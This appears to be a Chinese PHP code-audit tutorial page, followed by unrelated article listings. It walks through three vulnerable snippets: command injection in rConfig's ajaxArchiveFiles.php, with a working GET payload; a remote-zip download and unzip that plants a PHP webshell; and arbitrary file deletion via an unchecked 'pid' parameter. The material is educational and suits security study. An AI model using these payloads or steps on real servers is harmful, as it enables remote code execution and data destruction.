当前位置：首页 > news >正文

PHP代码审计之实战审代码篇2

news 2026/5/13 1:56:59

4. 仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？

<?php
require_once("/home/rconfig/classes/usersession.class.php");
require_once("/home/rconfig/classes/ADLog.class.php");
require_once("/home/rconfig/config/functions.inc.php");
$log = ADLog::getInstance();
if (!$session->logged_in) {echo 'Don\'t bother trying to hack me!!!!!<br /> This hack attempt has been logged';$log->Warn("Security Issue: Some tried to access this file directly from IP: " . $_SERVER['REMOTE_ADDR'] . " & Username: " . $session->username . " (File: " . $_SERVER['PHP_SELF'] . ")");// need to add authentication to this scriptheader("Location: " . $config_basedir . "login.php");
} else {
//archive logs files$mainPath = $_GET['path'];$archiveMainPath = $mainPath . "archive/";$ext = "*." . $_GET['ext'];$fullpath = $mainPath . $ext;
// create and archive dir if not already createdif (!is_dir($archiveMainPath)) {mkdir("$archiveMainPath");}$today = date("Ymd");$commandString = "sudo -u apache zip -r -j " . $archiveMainPath . "filename" . $today . ".zip " . $mainPath . $ext;$ext 是拼接上去的 是可控传参 没有经过任何过滤exec($commandString);foreach (glob($fullpath) as $v) {unlink($v);}$fileCount = count(glob($mainPath . $ext));if ($fileCount > 0) {$response = json_encode(array('failure' => true));} else {$response = json_encode(array('success' => true));}echo $response;
}  // end session check

拼接造成命令注入了！
相关payload参考

GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=1&ext=;ls%3E../../pq.txt HTTP/1.1

5.仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？

/A/c/PluginsController.php

PHP 的 fopen() 函数可以用来打开远程文件

其中这个类可用用action参数去调用不同函数，例如以下

解题:
那我们可以发两个包，一个用来调用start-download 函数来下载一个远程的zip文件。当然这个地址是我们可控的，
action=start-download&filepath=msgphone&download_url=http://0.0.0.0/test/a.zip
第二个包就调用file-upzip函数，让它去解压含php马的zip文件，也正好解压到了网站下的A/exts ,我们去访问它
action=sfile-upzip&filepath=msgphone&download_url=

6.仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？

public function delall(){if(isset($_POST['send'])){if(validate::isNullString($_POST['pid'])) tool::layer_alert('没有选择任何图片!','?a=pic',7);$_fileDir=ROOT_PATH.'/uploads/';foreach($_POST['pid'] as $_value){$_filePath=$_fileDir.$_value;if(!unlink($_filePath)){tool::layer_alert('图片删除失败,请设权限为777!','?a=pic',7);}else{header('Location:?a=pic');}}}}

pid是我们可控的，而且之后是拼接到filepath的那这不就造成任意文件删除了吗！
解题

PHP代码审计之实战审代码篇2

4. 仔细观察如下代码，思考代码有什么缺陷，可能由此引发什么样的问题？ <?php require_once("/home/rconfig/classes/usersession.class.php"); require_once("/home/rconfig/classes/ADLog.class.php"); require_onc…...

编程日记 2024/1/8 2:10:05

05 Ciso模拟器连接腾讯云物联网开发平台

Ciso声明：本篇文章基于使用腾讯云物联网平台连接自定义esp8266物联网设备(腾讯连连控制开关实现) - CSDN App改编一、总体概览功能描述： 使用腾讯连连小程序进行控制， Alarm（警铃）：开的时候&#xff…...

编程日记 2024/1/8 2:07:02

Nginx(二十) 获取真实客户端IP

客户端在访问互联网应用服务器时，与真实的应用服务器之间会因为有多层反向代理，而导致真实应用服务器获取的仅是最近一层的反向代理服务器 IP。为使 Nginx 后端的上游服务器可以获得真实客户端 IP，Nginx 提供了 ngx_http_realip_module 模块用…...

编程日记 2024/1/8 2:06:01

【攻防世界】Reverse—— IgniteMe writeup

main函数：首先检查前4个字符是否“EIS{”，如果是，则会进入check函数。如果check返回true，则会显示“Congratulations” int __cdecl main(int argc, const char **argv, const char **envp) {int result; // eaxsize_t i; // [es…...

编程日记 2024/1/8 2:05:00

m1芯片电脑上的paragon15如何安装激活 m1芯片电脑上ntfs for mac如何安装

Paragon NTFS软件在M1芯片电脑上安装之后，最后一步会让我们“允许加载第三方内核扩展”，具体如下图所示。图1：允许加载第三方内核扩展按照图中提示“单击此处“，然后打开安全与隐私。接下来依次点击小锁标志进行解锁&#xff0c…...

编程日记 2024/1/8 2:02:58

【DevOps-01]】DevOps介绍

一、简要描述 DevOps：Development & Operations的缩写，也就是开发&运维 DevOps是一个不断提高效率并且持续不断工作的过程。核心：简化Dev和Ops团队之间的流程，使整体软件开发过程更快速。 DevOps定义： DevOps 强调的是高效组织团队之间如何通过自动化的工具协作和…...

编程日记 2024/1/8 2:00:56

基于PHP的花店管理系统

有需要请加文章底部Q哦可远程调试基于PHP的花店管理系统一介绍此花店管理系统基于原生PHP开发，数据库mysql，前端bootstrap。系统角色分为用户和管理员。(附带参考设计文档) 技术栈：phpmysqlbootstrapphpstudyvscode 二功能用户 1 …...

编程日记 2024/1/8 1:57:54

《PySpark大数据分析实战》-24.数据可视化图表介绍

📋 博主简介 💖 作者简介：大家好，我是wux_labs。😜 热衷于各种主流技术，热爱数据科学、机器学习、云计算、人工智能。通过了TiDB数据库专员（PCTA）、TiDB数据库专家（PCTP…...

编程日记 2024/1/8 1:56:53

kafka 偏移量的类型与提交方式

kafka checkpoint 在流处理中，“checkpoint” 通常指的是将应用程序的状态保存到可靠的存储系统中，以便在发生故障或应用程序需要重启时能够从先前的状态中恢复。这包括保存处理过的事件、中间结果以及任何其他状态信息。“Checkpointing” 可以确保系统的一致性，并提供容错…...

编程日记 2024/1/8 1:54:52

TCP服务器的编写(下)

我们现在开始对我们的客户端开始封装我们的客户端，创建完套接字，需不需要bind呢？？ 当然是不需要的，你本身是一个客户端，其他人写的应用也可能是客户端，如果我们bind，一定意味着我们…...

编程日记 2024/1/8 1:52:50

Linux系统安全及应用

目录一、系统安全的加固 1、账号安全的基本措施 1.1 将用户设置为无法登录 1.2 锁定长期不使用的账号 1.3 删除无用的账号 1.4 锁定账号文件passwd、shadow 2、密码安全控制 2.1 设置密码有效期 2.1.1 适用于新建用户 2.1.2 适用于已有用户 2.2 强制用户下次登录一…...

编程日记 2024/1/8 1:50:48

初识Web服务器

一、web服务器 1、什么是web服务器？ web服务器就是web项目的容器，我们将开发好的web项目部署到web容器中，才能使用网络中的用户通过浏览器进行访问。一张图带你了解web服务器有啥作用： 在我的电脑上有一个已经做好的项目&#…...

编程日记 2024/1/8 1:48:47

IOS - 手机安装包 ipa 常见几种方式

安装 ipa 包的方法有很多中，可以通过不同的软件安装，本文只列出了常用的几种，做个简单的归纳整理 1、iTunes 安装数据线连接手机之后，会自动连接iTunes，（第一次连接的时候会提示是否信任此电脑&#xff0…...

编程日记 2024/1/8 1:47:46

60、resnet50 权值和参数加载

上一节我们将 resnet50 中需要下载的权值，以及每层卷积的参数，都下载并且保存到了仓库 resnet50_weight 目录，在仓库的这个连接。在将权值保存好之后，接下来就是要看如何使用这些权值，也就是如何加载。本节就介绍下我们实战过程中，如何加载这些权值。加载权值加载权…...

编程日记 2024/1/8 1:45:45

wordpress在界面将站点地址直接修改为https导致上不去问题的解决办法

wordpress在界面将站点地址直接修改为https导致上不去问题的解决办法 #修改数据库yz_options...

编程日记 2024/1/8 1:44:43

数字IC后端实现之快速获取innovus中drv violation的所有net list

在Innovus中place_opt_design和optDesign阶段，我们经常会看到如下所示的log提示信息，核心关键词是“ Reasons for remaining drv violations”。而且告诉我们总共有819条net存在drv violation，且无法被工具优化掉。 Reasons for remaining dr…...

编程日记 2024/1/8 1:42:41

【开源】基于JAVA语言的智能教学资源库系统

目录一、摘要1.1 项目介绍1.2 项目录屏二、功能模块2.1 数据中心模块2.2 课程档案模块2.3 课程资源模块2.4 课程作业模块2.5 课程评价模块三、系统设计3.1 用例设计3.2 数据库设计3.2.1 课程档案表3.2.2 课程资源表3.2.3 课程作业表3.2.4 课程评价表四、系统展示五、核心代…...

编程日记 2024/1/8 1:40:39

数据库定义和操作语句的重要语法

数据库📊的10种语法数据查询语句 select : 用于从数据库中检索数据。 select column1, column2,.... from table_name where condition; select distinct : 用于从数据库中检索唯一的数据值。 select DISTINCT column1, clumn2,... from table_name; 工作原理…...

编程日记 2024/1/8 1:38:37

计算机组成原理 CPU的功能和基本结构和指令执行过程

文章目录 CPU的功能和基本结构CPU的功能CPU的基本结构指令执行过程指令周期概念指令执行方案指令数据流取周期数据流析指周期数据流执行周期数据流中断周期数据流数据通路的功能和基本结构数据通路的功能数据通路的结构单总线 CPU的功能和基本结构 #mermaid-svg-0uHwjZOZh4kS…...

编程日记 2024/1/8 1:37:36

批量归一化：彻底改变深度学习架构

一、介绍在深度学习的动态领域，批量归一化的引入标志着神经网络训练方法的关键转变。这项创新技术由 Sergey Ioffe 和 Christian Szegedy 在 2015 年提出，已成为现代神经网络架构的基石。它解决了训练深度网络的关键挑战，特别是处理臭名昭著…...

编程日记 2024/1/8 1:35:34

知识付费浪潮下的技术学习：是捷径，还是新的信息茧房？

当“知识”成为一种商品打开手机，各类技术公众号、知识星球、极客时间专栏、慕课网实战课、B站充电视频……铺天盖地的“测试开发进阶”“性能测试大师班”“自动化测试框架实战”正以9.9元、199元、3999元的价格被明码标价。作为一名软件测试工程师，我们…...

编程新知 2026/5/13 1:54:47

从惊叹到依赖：软件定义时代的技术信任与实用指南

1. 从“惊叹”到“依赖”：我们与技术关系的深度剖析“这玩意儿以前没有的时候，我们是怎么活过来的？” 这念头时不时就会冒出来。我能看懂纸质地图，甚至开车时有时觉得它比谷歌地图更靠谱；我也记得在厚厚的黄页里翻找电…...

编程新知 2026/5/13 1:19:26

【收藏】2026测试人必看！再不学大模型AI，真的要被行业淘汰了

最近和身边做测试的朋友闲聊，发现大家的焦虑感比往年更重了——有人做了3年功能测试，跳槽面试连初筛都过不了；有人深耕性能测试5年，薪资原地踏步，反而被刚入行、懂AI测试的新人弯道超车。从ChatGPT横空出世引爆AI行业…...

编程新知 2026/5/13 1:15:15

抖音无水印下载神器：douyin-downloader完整指南，轻松保存高清视频

抖音无水印下载神器：douyin-downloader完整指南，轻松保存高清视频【免费下载链接】douyin-downloader A practical Douyin downloader for both single-item and profile batch downloads, with progress display, retries, SQLite deduplication, and …...

编程新知 2026/5/13 1:03:10

大模型压缩实战：量化、剪枝与蒸馏技术解析与AngelSlim应用

1. 项目概述：从“大”到“小”的模型压缩革命最近在模型部署和推理优化的圈子里，Tencent/AngelSlim 这个项目被讨论得挺多。简单来说，它不是一个全新的模型，而是一套由腾讯开源的、专门用于大语言模型（LLM）…...

编程新知 2026/5/13 0:38:34

3分钟掌握Windows任务栏投资助手：打造你的桌面股票监控中心

3分钟掌握Windows任务栏投资助手：打造你的桌面股票监控中心【免费下载链接】TrafficMonitorPlugins 用于TrafficMonitor的插件项目地址: https://gitcode.com/gh_mirrors/tr/TrafficMonitorPlugins 想在Windows任务栏上实时监控股票行情，又不想…...

编程新知 2026/5/12 23:42:33